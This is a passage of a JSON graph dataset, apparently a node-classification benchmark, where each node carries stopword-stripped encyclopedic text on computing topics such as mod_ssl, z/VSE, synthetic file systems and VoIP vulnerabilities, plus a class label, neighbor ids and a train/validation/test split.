resulting increased size shadow copy images result windows faces low disk space issue tries resolve deleting old checkpoints microsoft later provided details issue shadow copy provider operates 16-kb block level hence file system allocation units smaller 16 kb shadow copy properly discern defragmentation ordinary i/o operation needs recorded volumes 16 kb larger allocation units unaffected",
    "neighbors": [
      2560,
      6155,
      7187,
      10776,
      25,
      4637,
      5661,
      9762,
      4643,
      6180,
      7217,
      10803,
      10809,
      576,
      2625,
      8772,
      6221,
      3160,
      10333,
      4704,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      9335,
      5754,
      634,
      1147,
      3197,
      1150,
      5247,
      2687,
      639,
      7810,
      2179,
      10883,
      11390,
      651,
      10891,
      6797,
      10382,
      2193,
      2194,
      2197,
      2199,
      6296,
      2201,
      9370,
      9882,
      9887,
      8879,
      178,
      3250,
      9907,
      6837,
      6329,
      8889,
      2749,
      5823,
      8388,
      1736,
      2248,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      7403,
      242,
      5363,
      246,
      9466,
      9468,
      1278,
      10505,
      1804,
      6416,
      273,
      8977,
      787,
      789,
      5397,
      10016,
      292,
      3366,
      10235,
      2345,
      7983,
      819,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      4926,
      7999,
      11075,
      4423,
      2378,
      5452,
      6988,
      5457,
      7507,
      7511,
      9569,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      9593,
      890,
      8573,
      7039,
      2432,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11675,
      2462,
      5022,
      7070,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      7603,
      10676,
      3512,
      6078,
      9151,
      8129,
      11204,
      11205,
      4040,
      8136,
      9166,
      1501,
      4074,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11668,
    "label": 8,
    "text": "Mod_ssl:mod ssl mod_ssl optional module apache http server provides strong cryptography apache v1.3 v2 webserver via secure sockets layer ssl v2/v3 transport layer security tls v1 cryptographic protocols help open source ssl/tls toolkit openssl original version created apache v1.3 initially created april 1998 ralf s. engelschall via porting ben laurie apache-ssl 1.17 source patches apache 1.2.6 apache 1.3b6 version bsd-style license version v2.0 later contrast maintained apache software foundation licensed apache license 2.0 possible provide http https single server machine http https use different server ports direct conflict either maintainer would run two separate apache server instances one binds port 80 port 443 use apache virtual hosting facility maintainer create two virtual servers apache dispatches one responding port 80 speaking http one responding port 443 speaking https original mod_ssl apache 1.3 available www.modssl.org third-party add-on package requiring additional steps compilation configuration process also maintainer server needs resolve additional system apache dependencies apache 2 contrast built-in module maintained apache software foundation mod_ssl easily activated compilation configuration options mod_ssl v1 package initially created april 1998 ralf s. engelschall via porting ben laurie apache-ssl 1.17 source patches apache 1.2.6 apache 1.3b6 conflicts ben laurie development cycle re-assembled scratch apache 1.3.0 merging old mod_ssl 1.x newer apache-ssl 1.18 point mod_ssl lived life mod_ssl v2 first publicly released version mod_ssl 2.0.0 august 10 1998 us export restrictions cryptographic software loosened mod_ssl became part apache http server release apache httpd 2 october 10 2009 latest version released mod_ssl apache 1.3 mod_ssl v2.8.31-1.3.41 february 8 2008",
    "neighbors": [
      865,
      234,
      1468,
      1583
    ],
    "mask": "Test"
  },
  {
    "node_id": 11669,
    "label": 2,
    "text": "Molinux:molinux molinux operating system based ubuntu sponsored autonomous community castilla-la mancha fundación ínsula barataria name molinux derives spanish word molino meaning mill windmill version molinux named character classic spanish novel quixote miguel de cervantes molinux initiative begun 2005 government castilla-la mancha introduce castile-la mancha community forefront information society molinux project intended attack digital divide reducing cost software offering easy-to-use operating system sponsoring regional government commitment open source philosophy committed impose use molinux advantage software free compete anyone user choose using software molinux 6.2 codename merlín launched 2010-12-24 based ubuntu 10.10",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      3478,
      4887,
      10394,
      8476,
      673,
      3745,
      5410,
      10530,
      6393,
      9253,
      10149,
      11305,
      7854,
      7983,
      8112,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      10687,
      4673,
      3654,
      2375,
      4039,
      5962,
      8907,
      1107,
      1110,
      4951,
      9693,
      3550,
      5343,
      4192,
      6625,
      2914,
      7140,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      9324,
      7534,
      2671,
      7920,
      8177,
      2930,
      9074,
      1396,
      3189,
      9461,
      9971,
      10860,
      5369,
      5755,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 11670,
    "label": 9,
    "text": "Da_Vinci_Machine:da vinci machine da vinci machine also called multi language virtual machine sun microsystems project aiming prototype extension java virtual machine jvm add support dynamic languages already possible run dynamic languages top jvm goal ease new dynamic language implementations increase performance project reference implementation jsr 292 supporting dynamically typed languages java platform prior java 7 java virtual machine built-in support dynamically typed languages jsr 292 supporting dynamically typed languages java platform proposes following success jruby java implementation da vinci project started end january 2008 capabilities experimented da vinci planned added java 7 aims prototype jsr also lower-priority extensions first working prototype developed patch openjdk announced made available end august 2008 since jruby team successfully wired dynamic invocation codebase dynamic invocation shipped 1.1.5 release disabled jvms without codice_1 capabilities since project integrated jdk 7 codebase integrated java 7 release dynamic invocation built fact even java strongly static language language level type information much less prevalent bytecode level however dynamic languages implementations need able use just-in-time compilation rather reflection achieve good performance compile scripts bytecode runtime allowed run java virtual machine bytecodes must verified prior execution verifier check types static throughout code leads implementations create many different bytecodes different contexts method call time signature arguments change uses lot memory also fills memory area called metaspace permanent generation prior java 8 part heap used jvm store information classes memory used area almost never garbage collected stores immutable data context java programs dynamic languages implementations compile small part scripts jsr 292 proposes",
    "neighbors": [
      2304,
      4960,
      8609,
      9665,
      4231,
      5612,
      2556,
      5872,
      3761,
      7983,
      2804,
      1591,
      220,
      5567
    ],
    "mask": "Train"
  },
  {
    "node_id": 11671,
    "label": 4,
    "text": "VoIP_vulnerabilities:voip vulnerabilities voip vulnerable similar types attacks web connection emails prone voip attractiveness low fixed cost numerous features come risks well known developers constantly addressed risks usually mentioned business common target voip also allows use fraud shady practices people aware practices restricted providers possibility someone using gain still exists unencrypted connections lead communication security breaches hackers/trackers eavesdrops important private conversations extract valuable data overheard conversations might sold used competing businesses gathered intelligence also used blackmail personal gain attacks user network internet provider disrupt even cut connection since voip highly dependent internet connection direct attacks internet connection provider highly effective way attack kind attacks targeting office telephony since mobile internet harder interrupt also mobile applications relying internet connection make voip calls immune attacks hardphones a.k.a voip phone smart devices computer phone need well configured chinese manufacturers cases using default passwords manufactured devices leading vulnerabilities voip even voip relatively secure 2017 still needs source internet cases wifi network home/office wifi relatively secure using public shared networks compromise connection voip spam called spit spam internet telephony using unlimited extensions provided voip pbx capabilities spammer constantly harass target different numbers process hard automate fill targets voice mail notifications caller make calls often enough block target getting important incoming calls practices cost lot caller rarely used marketing needs voip users change caller id a.k.a caller id spoofing allowing caller represent relative colleague part family order extract information money benefits form target",
    "neighbors": [
      11170,
      10996,
      8950
    ],
    "mask": "Test"
  },
  {
    "node_id": 11672,
    "label": 2,
    "text": "Window_class:window class computer programming window class structure fundamental microsoft windows win16 win32 win64 operating systems application programming interface api structure provides template windows may created specifying window icons menu background color features also holds pointer procedure controls window behaves response user interaction finally tells operating system much additional storage space needed class window created two versions window classes non-technical addition brought second one small additional icon window first version present windows 3.x series second version appeared windows 95 windows nt 3.1",
    "neighbors": [
      4300,
      6797,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11673,
    "label": 2,
    "text": "VSE_(operating_system):vse operating system z/vse virtual storage extended operating system ibm mainframe computers latest one dos/360 lineage originated 1965 announced feb. 1 2005 ibm successor vsa/esa 2.7 then-new z/vsewas named reflect new system z branding ibm mainframe product line dos/vse introduced 1979 successor dos/vs turn dos/vse succeeded vse/sp version 1 1983 vse/sp version 2 1985 less common prominent z/os mostly used smaller machines late 1980s widespread perception among vse customers ibm planning discontinue vse migrate customers mvs instead although ibm relented agreed continue produce new versions vse dos/360 originally supported 24-bit addressing underlying hardware evolved vse/esa acquired support 31-bit addressing ibm released z/vse version 4 requires 64-bit z/architecture hardware supports 64-bit real mode addressing 2007 z/vse 5.1 available since 2011 z/vse introduced 64 bit virtual addressing memory objects chunks virtual storage allocated 2 gb latest shipping release z/vse 6.2.0 available since december 2017 includes new cics transaction server z/vse 2.2 job control language jcl continues positional-parameter orientation earlier dos systems z/vse batch processing primary user interface also another special interface system console operators z/vse like z/os systems traditionally supported 3270 terminal user interfaces however z/vse installations least begun add web browser access z/vse applications z/vse tcp/ip separately priced option historic reasons available two different versions two vendors vendors provide full function tcp/ip stack applications telnet ftp one tcp/ip stack provides ipv4 communication ipv4 ipv6 communication addition commercially available tcp/ip stacks z/vse ibm also provides linux fastpath method uses iucv socket hipersockets connections communicate linux guest also running mainframe using method z/vse system able fully exploit native linux tcp/ip stack ibm recommends z/vse customers run linux z systems alongside physical system provide another 64-bit application environment access extend z/vse applications data via hipersockets using wide variety middleware cics one popular enterprise transaction processing systems extremely popular among z/vse users supports recent innovations web services db2 also available popular z/vse supports eckd well scsi devices fibre channel access scsi storage devices initially supported z/vse 3.1 limited basis including ibm enterprise storage server ess ibm system storage ds8000 ds6000 series limitations disappeared 4.2 thus including ibm storwize v7000 v5000 v3700 v9000 last vse/esa release vse/esa 2.7 longer supported since february 28 2007. z/vse 3.1 last release compatible 31-bit mainframes opposed z/vse version 4 5 6. z/vse 3.1 supported 2009. z/vse version 4 longer supported since october 2014 end service z/vse 4.3 vse/esa dos/vse vse/sp see history ibm mainframe operating systems dos/vs",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      7,
      2314,
      3978,
      10508,
      7053,
      8077,
      9361,
      9619,
      9468,
      789,
      5397,
      11673,
      9370,
      5531,
      6557,
      3359,
      4255,
      10273,
      8482,
      421,
      7848,
      6442,
      1323,
      7983,
      8751,
      7217,
      8879,
      9139,
      10803,
      6325,
      6454,
      7477,
      7607,
      7733,
      5562,
      8502,
      10040,
      573,
      11450,
      1219,
      964,
      7364,
      6342,
      8388,
      8136,
      7881,
      11184,
      1235,
      7507,
      4565,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      6248,
      5492,
      2933,
      375,
      2168,
      3323,
      2172,
      2813,
      4862,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11674,
    "label": 9,
    "text": "Reference_(computer_science):reference computer science computer science reference value enables program indirectly access particular datum variable value record computer memory storage device reference said refer datum accessing datum called dereferencing reference reference distinct datum typically references data stored memory given system reference implemented physical address data stored memory storage device reason reference often erroneously confused pointer address said point data however reference may also implemented ways offset difference datum address fixed base address index array abstractly handle broadly networking references may network addresses urls concept reference must confused values keys identifiers uniquely identify data item give access non-trivial lookup operation table data structure references widely used programming especially efficiently pass large mutable data arguments procedures share data among various uses particular reference may point variable record contains references data idea basis indirect addressing many linked data structures linked lists references cause significant complexity program partially due possibility dangling wild references partially topology data references directed graph whose analysis quite complicated references increase flexibility objects stored allocated passed areas code long one access reference data one access data data need moved also make sharing data different code areas easier keeps reference mechanism references varying implementation fundamental programming language feature common nearly modern programming languages even languages support direct use references internal implicit use example call reference calling convention implemented either explicit implicit use references pointers primitive due intimate relationship underlying hardware one powerful efficient types references however also due relationship pointers require strong understanding programmer details memory architecture pointers store memory location address instead value directly inappropriate use pointers lead undefined behavior program particularly due dangling pointers wild pointers smart pointers opaque data structures act like pointers accessed particular methods handle abstract reference may represented various ways common example file handles file data structure c standard i/o library used abstract file content usually represents file requesting lock file specific position within file content reading file distributed computing reference may contain address identifier may also include embedded specification network protocols used locate access referenced object way information encoded serialized thus example wsdl description remote web service viewed form reference includes complete specification locate bind particular web service reference live distributed object another example complete specification construct small software component called proxy subsequently engage peer-to-peer interaction local machine may gain access data replicated exists weakly consistent message stream cases reference includes full set instructions recipe access data sense serves purpose identifier address memory generally reference considered piece data allows unique retrieval another piece data includes primary keys databases keys associative array set keys k set data objects well-defined single-valued function k ∪ null defines type reference null image key referring anything meaningful alternative representation function directed graph called reachability graph datum represented vertex edge u v datum u refers datum v maximum out-degree one graphs valuable garbage collection used separate accessible inaccessible objects many data structures large complex objects composed smaller objects objects typically stored one two ways internal storage usually efficient space cost references dynamic allocation metadata time cost associated dereferencing reference allocating memory smaller objects internal storage also enhances locality reference keeping different parts large object close together memory however variety situations external storage preferred languages java smalltalk python scheme support internal storage languages objects uniformly accessed references assembly languages first languages used typical express references using either raw memory addresses indexes tables work somewhat tricky use address tells nothing value points even large interpret information encoded program logic result misinterpretations occur incorrect programs causing bewildering errors one earliest opaque references lisp language cons cell simply record containing two references lisp objects including possibly cons cells simple structure commonly used build singly linked lists also used build simple binary trees so-called dotted lists terminate null reference value another early language fortran explicit representation references use implicitly call-by-reference calling semantics pointer still one popular types references today similar assembly representation raw address except carries static datatype used compile-time ensure data refers misinterpreted however c weak type system violated using casts explicit conversions various pointer types pointer types integers misinterpretation still possible difficult successor c++ tried increase type safety pointers new cast operators smart pointers standard library still retained ability circumvent safety mechanisms compatibility number popular mainstream languages today eiffel java c visual basic adopted much opaque type reference usually referred simply reference references types like c pointers indicating interpret data reference typesafe interpreted raw address unsafe conversions permitted fortran reference best thought alias another object scalar variable row column array syntax dereference reference manipulate contents referent directly fortran references null languages references facilitate processing dynamic structures linked lists queues trees settings concept mutable variables data modified often makes implicit use references standard ml ocaml many functional languages values persistent modified assignment assignable reference cells serve unavoidable purposes mutable references imperative languages make capability modified explicit reference cells hold value given polymorphic type codice_1 codice_2 replaced type value pointed mutable references pointed different objects lifetime example permits building circular data structures reference cell functionally equivalent array length 1 preserve safety efficient implementations references type-cast ml pointer arithmetic performed important note functional paradigm many structures would represented using pointers language like c represented using facilities powerful algebraic datatype mechanism programmer able enjoy certain properties guarantee immutability programming even though compiler often uses machine pointers hood languages like perl support symbolic references string values contain names variables value regular reference dereferenced perl considers symbolic reference gives variable name given value php similar feature form codice_3 syntax many object oriented languages make extensive use references may use references access assign objects references also used function/method calls message passing reference counts frequently used perform garbage collection unused objects",
    "neighbors": [
      4101,
      11274,
      6160,
      2076,
      541,
      10270,
      9248,
      545,
      5677,
      53,
      8251,
      8773,
      7756,
      11355,
      6239,
      5223,
      2666,
      9325,
      3702,
      119,
      7292,
      136,
      3212,
      655,
      5783,
      5796,
      6330,
      10938,
      4797,
      3790,
      10452,
      9941,
      4847,
      5872,
      7921,
      7412,
      9466,
      5885,
      2304,
      10510,
      9490,
      10004,
      3350,
      10011,
      10016,
      10020,
      1841,
      11574,
      10043,
      7488,
      5449,
      846,
      847,
      5967,
      2901,
      10581,
      11610,
      10083,
      3428,
      6502,
      8554,
      5483,
      10097,
      3960,
      2936,
      2945,
      10628,
      8582,
      10126,
      5521,
      10145,
      1954,
      4024,
      10684,
      8644,
      6087,
      5595,
      4572,
      477,
      479,
      6629,
      3562,
      3052,
      11245,
      10736,
      10737,
      3577,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11675,
    "label": 6,
    "text": "Synthetic_file_system:synthetic file system computer science synthetic file system pseudo file system hierarchical interface non-file objects appear regular files tree disk-based long-term-storage file system non-file objects may accessed system calls utility programs regular files directories common term regular files non-file objects node benefit synthetic file systems well known file system semantics reused universal easily implementable approach interprocess communication clients use file system perform simple file operations nodes implement complex message encoding passing methods aspects protocol engineering operations common file utilities used even scripting quite easy commonly known everything file generally regarded originated unix unix-world commonly special filesystem mounted /proc filesystem implemented within kernel publishes information processes process directory named process id containing detailed information process status open files memory maps mounts etc /proc first appeared unix 8th edition functionality greatly expanded plan 9 bell labs /sys filesystem linux complements /proc providing lot non-process related detailed information in-kernel status userspace traditional unix systems locate information sysctl calls obexfs fuse-based filesystem provides access obex objects via filesystem applications work remote objects via obex protocol simply local files plan 9 bell labs operating system family concept 9p synthetic filesystem used generic ipc method contrary operating systems plan 9 design heavily distributed os worlds many often large libraries frameworks common things plan 9 encapsulates fileservers important benefit applications much simpler services run network platform agnostic reside virtually host platform network virtually kind network long fileserver mounted application plan 9 drives concept expansively operating system services e.g hardware access networking stack presented fileservers way trivial use resources remotely e.g one host directly accessing another host block devices network interfaces without need additional protocols implementations 9p file system protocol also exists many systems environments debugging embedded systems even system-on-chip soc devices widely known difficult several protocols implemented provide direct access in-chip devices tend proprietary complex hard handle based 9p plan 9 network filesystem studies suggest using synthetic filesystems universal access scheme information major benefit 9p simple quite easy implement hardware easily used virtually kind network serial link internet major argument using synthetic filesystems might flexibility easy access service-oriented architectures noticeable number applications use scheme overall overhead code resource consumption maintenance work reduced significantly many general arguments soas also apply arguments synthetic filesystems include fact filesytem semantics may fit application scenarios example complex remote procedure calls many parameters tend hard map filesystem schemes may require application redesign",
    "neighbors": [
      5120,
      2564,
      4107,
      6669,
      3598,
      10257,
      6675,
      7187,
      6677,
      5142,
      8214,
      9236,
      25,
      10776,
      3611,
      4637,
      9249,
      9762,
      5158,
      7728,
      7217,
      9780,
      9784,
      7225,
      10809,
      11323,
      576,
      8772,
      1109,
      10333,
      97,
      4708,
      8298,
      9836,
      7789,
      7285,
      9333,
      6263,
      2168,
      9335,
      1147,
      3197,
      1150,
      9343,
      2179,
      10883,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      9366,
      2199,
      6296,
      11419,
      7325,
      9887,
      6309,
      1190,
      5286,
      10405,
      5293,
      3248,
      7344,
      6837,
      2230,
      5816,
      1212,
      8380,
      3265,
      8388,
      10951,
      9420,
      9932,
      5840,
      7378,
      3795,
      4819,
      8402,
      7382,
      8404,
      728,
      8410,
      6365,
      9441,
      739,
      7907,
      1253,
      8938,
      1263,
      3312,
      3826,
      2291,
      5363,
      246,
      3834,
      2811,
      3328,
      10499,
      11012,
      2314,
      1804,
      8461,
      6416,
      273,
      1810,
      11539,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      7975,
      3368,
      2345,
      10235,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      823,
      4409,
      6970,
      7483,
      11072,
      11075,
      3909,
      4423,
      2378,
      4431,
      5457,
      5969,
      11601,
      346,
      2395,
      2397,
      10590,
      10596,
      2407,
      8551,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      394,
      3978,
      8075,
      7565,
      6545,
      7057,
      11667,
      5013,
      8092,
      11676,
      414,
      2974,
      7070,
      421,
      5029,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      6075,
      6078,
      9151,
      3522,
      8643,
      8136,
      7126,
      2015,
      1509,
      9189,
      7663,
      6128,
      5619,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 11676,
    "label": 6,
    "text": "AXFS:axfs axfs advanced xip filesystem compressed read-only file system linux initially developed intel maintained numonyx designed use execute place xip alongside compression aiming reduce boot program load times retaining small memory footprint embedded devices achieved mixing compressed uncompressed pages executable file axfs free software licensed gpl cramfs another read-only compressed file system supports xip patches however uses strategy decompressing entire files whereas axfs supports xip page granularity",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 11677,
    "label": 2,
    "text": "Purble_Place:purble place purble place suite three computer games children teenagers developed oberon games microsoft introduced windows vista also included windows 7 publicly introduced windows vista build 5219 along chess titans mahjong titans collection single home screen offers three packs games purble pairs comfy cakes purble shop purble pairs pattern recognition memory game similar pelmanism object clear tableau fewest turns skill level progresses game becomes timed grid size increases similar pictures used beginner level one 5x5 grid intermediate two 6x6 grids advanced four 8x8 grids solve per game addition joker automatically finds another match exposed card numerous special pairs present higher levels card batter machine comfy cakes shuffles board paired clock adds time timer master chef automatically finds matches pairs cards containing cakes sneak peek coin bonus allows player expose remaining cards couple seconds every card exposed way counted turn comfy cakes hand-eye coordination game object fill orders bakery assembling cake match given specification controlling conveyor belt brings cake various stations elements cake include shapes square circular heart-shaped flavor batter strawberry chocolate vanilla optional icing flavors used batter decorations e.g sugar may sprinkled top cake rarer cases flames applied iced cakes create smooth glaze cake match specification player penalized cake gets thrown trash player sends three incorrect orders game certain number correct orders shipped player wins game score tabulated final score depends upon number cakes baked number incorrect orders sent efficiency player baking higher levels specifications become complex multiple cakes must manufactured parallel single conveyor belt player makes 5 6 cakes one difficulty levels purble shop code-breaker game computer decides color five features hat eyes nose mouth clothes concealed player color may used feature color used several times used player attempts deduce guess correct feature colors limited number moves three difficulty levels beginner three features three possible colors 3 27 different possible solutions intermediate 4 256 solutions advanced 5 3125 solutions beginner intermediate levels guessing games move computer tells player items correct little scope deduction advanced level computer n't tell player specific items correct reporting count picks correct color position count picks correct color wrong position level similar colored peg game mastermind success requires logical reasoning although small chance succeeding lucky guesses",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11678,
    "label": 2,
    "text": "Crypto_API_(Linux):crypto api linux crypto api cryptography framework linux kernel various parts kernel deal cryptography ipsec dm-crypt introduced kernel version 2.5.45 since expanded include essentially popular block ciphers hash functions many platforms provide hardware acceleration aes encryption expose programs extension instruction set architecture isa various chipsets e.g aes instruction set x86 sort implementation program kernel-mode user-space may utilize features directly platforms arm kirkwood sheevaplug amd geode processors however implemented isa extensions accessible kernel-mode drivers order user-mode applications utilize encryption openssl gnutls take advantage acceleration must interface kernel",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      7252,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      3742,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      5358,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      9541,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      9196,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 11679,
    "label": 9,
    "text": "Peter_Wegner:peter wegner peter a. wegner august 20 1932 – july 27 2017 computer scientist made significant contributions theory object-oriented programming 1980s relevance church–turing thesis empirical aspects computer science 1990s present 2016 wegner wrote brief autobiography conduit annual brown university computer science department magazine wegner educated university cambridge received post-graduate diploma numerical analysis automatic computing 1954 time phd programs computer science awarded phd university london 1968 book programming languages information structures machine organization maurice wilkes listed supervisor seminal work previous occupation understanding types co-authored luca cardelli latter undertaking co-authored several papers co-edited book interactive computation new paradigm published 2006 wegner inducted fellow association computing machinery acm 1995 received acm distinguished service award 2000 1999 awarded austrian cross honor science art 1st class österreichisches ehrenkreuz für wissenschaft u. kunst i. klasse hit bus sustained serious brain injuries trip london receive award recovered lengthy coma editor-in-chief acm computing surveys brown faculty bulletin professor brown university",
    "neighbors": [
      10145,
      8262,
      7634,
      8884,
      11574,
      1783,
      9535
    ],
    "mask": "Test"
  },
  {
    "node_id": 11680,
    "label": 2,
    "text": "UserLAnd_Technologies:userland technologies userland technologies free open-source ad-free compatibility layer mobile app allows linux distributions computer programs computer games numerical computing programs run mobile devices without requiring root account userland also provides program library popular free open-source linux-based programs additional programs different versions programs added unlike linux compatibility layer mobile apps userland require root account userland ability function without root directories also known rooting avoids bricking non-functionality mobile device linux program use addition making mobile device non-functional may void device warranty furthermore requirement programs userland root mobile device proven formidable challenge inexperienced linux users prior application gnuroot debian attempted similarly run linux programs mobile devices ceased maintained therefore longer operational userland allows mobile device run linux programs many n't available mobile apps even linux applications e.g firefox mobile versions available people often find user experience mobile versions pales comparison desktop userland allows users recreate desktop experience mobile device userland currently operates android mobile devices userland available download google play f-droid use userland one must first download-typically google play store-the application install installed user selects app open program selected user prompted enter login information select connection type following user gains access selected program userland pre-loaded distributions alpine arch debian kali ubuntu web browser firefox desktop environments lxde xfce deployment environments git idle text-based games colossal cave adventure zork numerical computing programs gnuplot gnu octave r office suite libreoffice graphics editors gimp inkscape program library linux programs different versions programs may added review slant.co listed userland pro support vnc x sessions rooting required easy setup free open-source con lack support lollipop difficulty use non-technical users contrary os journal found lack need root mobile device made using userland considerably easier linux compatibility layer applications position shared slashgear review userland os journal went state userland one could almost anything ’ limited insanity respect application linux journal stated userland offers quick easy way run entire linux distribution even linux application game pocket slashgear stated userland absolutely super simple use requires little technical knowledge get ground running",
    "neighbors": [
      577,
      5703,
      5833,
      7722,
      7595,
      5677,
      7983,
      7920,
      2804,
      4309,
      5078,
      823,
      9972,
      5435,
      8413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11681,
    "label": 4,
    "text": "Brendan_Hannigan:brendan hannigan brendan hannigan former head international business machines ibm security systems division helped develop industry first intelligent cloud computing security portfolio also entrepreneur investor focuses security cloud software service saas startups hannigan born ireland finished bsc computer science university college dublin 1987 school became interested fortran programming vax computer architecture immigrated united states early 1990s first lived boston massachusetts secured employment motorola hannigan started working dublin worked digital equipment job irish company involved writing terminal server routing codes relocated u.s. joined motorola wellfleet communications also worked forrester research 1996 2000 director network research implemented successful practices areas enterprise networks security technology product management hannigan however known founding startup q1 labs acquired ibm 2011 company co-founded sandy bird provided security software analyze monitor events interview said ideas based simple realization perimeter protection paradigm companies relied n't work world bad actors sophisticated built upon foundation intelligence must bring security closer data person transaction. ” q1 labs security features seen compatible ibm analytic capability hence acquisition ibm acquired q1 labs company created new division focused helping clients address security challenges q1 labs formed basis security division hannigan tapped lead according gartner division established third largest security software company idc lists hannigan ’ group world leader security services ibm would later acquire startups reinforced division range security services hannigan retired ibm 2016 four years working company november 2016 hannigan joined polaris partners venture partner involved identifying tech startups funding founding experience ibm also focuses cloud infrastructure cybersecurity hannigan maintains business world shifting traditional data center towards multiple cloud services 2019 co-founded sonrai security startup offers organizations better data security across multicloud deployments software-as-a-service product offering aside investor also serves ceo startup able raise 18.5 million going public",
    "neighbors": [
      4194,
      11604,
      3960,
      3323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11682,
    "label": 8,
    "text": "NaviServer:naviserver naviserver high performance web server written c tcl easily extended either language create web sites services 35 modules available project active development hosted sourceforge licensed terms mozilla public license mpl recent new features include naviserver based aolserver version 4.10 aol open-source web server naviserver project started fork aolserver project different supporting multiple protocols providing higher scalability asynchronous i/o aims less conservative new feature development historically naviserver original name server closed-source product company called navisoft early 1990s bought aol 1995 released open-source 1999 aolserver released mozilla friendly-fork takes code back original name",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      1556,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      692,
      6714,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      5470,
      225,
      865,
      1250,
      2404,
      4837,
      9834,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11683,
    "label": 9,
